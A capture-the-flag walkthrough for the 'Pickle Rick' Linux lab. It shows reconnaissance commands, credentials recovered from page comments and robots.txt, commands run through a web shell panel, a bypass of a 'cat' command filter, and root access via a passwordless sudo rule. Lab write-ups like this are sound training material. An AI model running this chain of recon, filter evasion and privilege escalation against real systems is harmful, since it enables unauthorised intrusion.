---
Pickle Rick is an Easy Linux CTF themed around Rick and Morty. Three ingredients are hidden across the machine. The credentials needed to enter the web command panel are sitting in plain sight in the page source and robots.txt — a reminder that attackers read everything before they touch a login form. Once inside, the privilege escalation is as simple as checking what the web user is allowed to run as root.
kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV $TARGET_IP
Starting Nmap 7.94 ( https://nmap.org ) at 2026-08-14 19:45 UTC
Nmap scan report for $TARGET_IP
Host is up (0.033s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 47:f6:46:6d:69:66:b6:b9:16:af:1b:1d:cd:1a:6f:03 (RSA)
| 256 54:f8:83:a9:0c:98:24:c2:f0:55:53:59:e5:7b:d0:1f (ECDSA)
|_ 256 ec:bc:a3:e7:d9:77:0e:35:db:8e:6c:bc:80:80:7e:c2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Rick is sup4r cool
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap done: 1 IP address (1 host up) scanned in 8.12 seconds
Port 80 is the attack surface. Before touching the login form, read everything the web server exposes: the page source and robots.txt.
kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://$TARGET_IP -w /usr/share/wordlists/dirb/common.txt -x php
===============================================================
Gobuster v3.6
===============================================================
[+] Url: http://$TARGET_IP
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Extensions: php
[+] Status codes: 200,204,301,302,307,401,403
===============================================================
/assets (Status: 301)
/index.html (Status: 200)
/login.php (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
===============================================================
login.php is the entry point. Both robots.txt and the page source need to be checked first.
kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ curl -s http://$TARGET_IP | grep -i "<!--"
<!--
Note to self, remember username!
Username: R1ckRul3s
-->
Password — robots.txt:
kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ curl http://$TARGET_IP/robots.txt
Wubbalubbadubdub
Credentials: R1ckRul3s / Wubbalubbadubdub
robots.txt is a public file that tells search crawlers what not to index. In real engagements it is one of the first places to check — it regularly exposes staging paths, backup directories, admin panels, and occasionally credentials left by mistake.
Log in at http://$TARGET_IP/login.php. The application presents a command panel that passes input to a shell and returns the output in the browser — this is Remote Code Execution (RCE) running as www-data.
Enter Command $ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Enter Command $ uname -a
Linux ip-$TARGET_IP 4.4.0-1075-aws #85-Ubuntu SMP Thu Jan 17 00:16:26 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
Enter Command $ pwd
/var/www/html
Note: cat is blocked by the application. Use less, strings, or more as substitutes — they read file content through different system calls, bypassing a naive filter on the word cat.
Enter Command $ ls -la
total 40
drwxr-xr-x 3 root root 4096 Feb 10 2019 .
drwxr-xr-x 3 root root 4096 Feb 10 2019 ..
-rwxr-xr-x 1 ubuntu ubuntu 882 Feb 10 2019 Sup3rS3cretPickl3Ingred.txt
-rwxr-xr-x 1 ubuntu ubuntu 17 Feb 10 2019 assets
-rwxr-xr-x 1 root root 742 Feb 10 2019 clue.txt
-rwxr-xr-x 1 root root 1105 Feb 10 2019 denied.php
-rwxrwxrwx 1 root root 1062 Feb 10 2019 index.html
-rwxr-xr-x 1 root root 1438 Feb 10 2019 login.php
-rwxr-xr-x 1 root root 2044 Feb 10 2019 portal.php
-rwxr-xr-x 1 root root 17 Feb 10 2019 robots.txt
Enter Command $ less Sup3rS3cretPickl3Ingred.txt
$INGREDIENT_1
clue.txt points toward the next ingredient:
Enter Command $ less clue.txt
Look around the file system for the other ingredient.
Enter Command $ ls /home
rick ubuntu
Enter Command $ ls -la /home/rick
total 12
drwxrwxrwx 2 root root 4096 Feb 10 2019 .
drwxr-xr-x 4 root root 4096 Feb 10 2019 ..
-rwxrwxrwx 1 root root 13 Feb 10 2019 second ingredients
Enter Command $ less /home/rick/second\ ingredients
$INGREDIENT_2
Before trying any exploit, check what the current user is allowed to run with elevated privileges. sudo -l is the first command for Linux privilege escalation:
Enter Command $ sudo -l
Matching Defaults entries for www-data on ip-$TARGET_IP:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ip-$TARGET_IP:
(ALL) NOPASSWD: ALL
www-data — a web-facing process user — is allowed to run any command as root with no password. NOPASSWD: ALL is the highest possible misconfiguration: any web vulnerability that gives code execution on this server immediately yields full root access with zero extra steps.
Enter Command $ sudo ls /root
3rd.txt snap
Enter Command $ sudo less /root/3rd.txt
$INGREDIENT_3
robots.txt is a public file — it tells search crawlers what not to index while simultaneously advertising those exact paths to attackers. Check it immediately.cat is blocked, use less, strings, more, or tac. A filter blocking one command name never blocks all ways to read a file.sudo -l is always the first privilege escalation check on Linux. NOPASSWD: ALL on a web service account means any RCE on the web layer gives root instantly — no further exploitation needed.